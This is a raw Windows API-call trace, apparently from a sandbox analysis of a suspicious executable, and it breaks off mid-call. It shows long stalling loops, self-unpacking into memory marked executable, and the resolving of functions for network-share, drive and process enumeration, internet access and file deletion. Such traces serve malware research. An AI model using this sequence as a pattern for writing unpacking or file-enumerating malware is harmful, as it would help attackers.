GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.101] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.101] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.101] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.102] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.102] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.103] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.103] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.104] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.104] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.105] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.105] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.106] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.106] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.107] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.107] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.107] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.107] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0045.751] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0045.808] VirtualProtect (in: lpAddress=0x210020, dwSize=0x90e08, flNewProtect=0x40, lpflOldProtect=0x18e670 | out: lpflOldProtect=0x18e670*=0x4) returned 1 [0045.888] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0045.888] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0045.888] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0045.888] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0045.888] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0045.888] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0045.888] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0045.889] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0045.889] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0045.892] Module32First (hSnapshot=0x58, lpme=0x18ec00) returned 1 [0045.894] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x570000 [0045.944] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0045.944] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0045.944] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0045.944] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0045.944] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0045.944] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0045.945] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0045.945] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0045.945] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0045.945] SetErrorMode (uMode=0x400) returned 0x0 [0045.945] SetErrorMode (uMode=0x0) returned 0x400 [0045.945] GetVersionExA (in: lpVersionInformation=0x18db30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18db30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0045.945] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f10000 [0045.968] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ebb8 | out: lpflOldProtect=0x18ebb8*=0x2) returned 1 [0046.293] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.300] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0046.300] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0046.300] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0046.300] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0046.300] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0046.301] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0046.301] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0046.523] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0046.524] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0046.524] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0046.524] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0057.656] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0057.656] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0057.656] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0057.656] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0057.657] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0057.657] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0057.657] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0057.657] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0058.188] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0058.188] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0058.188] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0058.188] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0058.188] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0058.188] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0058.189] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0058.189] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0058.189] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0058.189] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0058.189] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0058.189] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0058.189] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0058.189] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0058.189] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0058.190] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0058.191] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0058.192] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0058.193] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0058.194] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0058.195] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0058.196] GetProcAddress (hModule=0x76d30000, 